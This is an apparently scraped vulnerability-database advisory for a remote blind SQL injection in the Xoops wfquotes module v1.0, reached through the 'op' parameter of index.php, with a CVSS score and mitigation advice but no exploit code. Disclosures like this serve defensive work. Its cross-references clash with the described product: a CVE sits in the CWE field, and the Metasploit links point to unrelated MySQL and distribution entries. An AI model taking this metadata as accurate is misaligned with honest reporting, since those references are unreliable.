Vendor: wfquotes module
By: Unknown
CVSS: 7.5 (HIGH)
Remote Blind SQL Injection
CWE: 89
Product Name: wfquotes module
Affected Version From: v1.0
Affected Version To: v1.0
Patch Exists: NO
Related CWE: CVE-2007-2691
CPE: a:xoops:xoops:1.0
Metasploit:
https://www.rapid7.com/db/vulnerabilities/freebsd-vid-bb4e9a44-dff2-11dd-a765-0030843d3802/, https://www.rapid7.com/db/vulnerabilities/apple-osx-mysqlserver-cve-2007-2691/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2007-0894/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0768/, https://www.rapid7.com/db/vulnerabilities/suse-cve-2007-2691/, https://www.rapid7.com/db/vulnerabilities/linuxrpm-RHSA-2008-0364/
Platforms Tested:
2007
Xoops wfquotes module v1.0 0 Remote Blind SQL Injection
The wfquotes module in Xoops v1.0 0 allows remote attackers to execute arbitrary SQL commands via the op parameter in the index.php script.
Mitigation:
Upgrade to a patched version of Xoops or apply a vendor-supplied patch.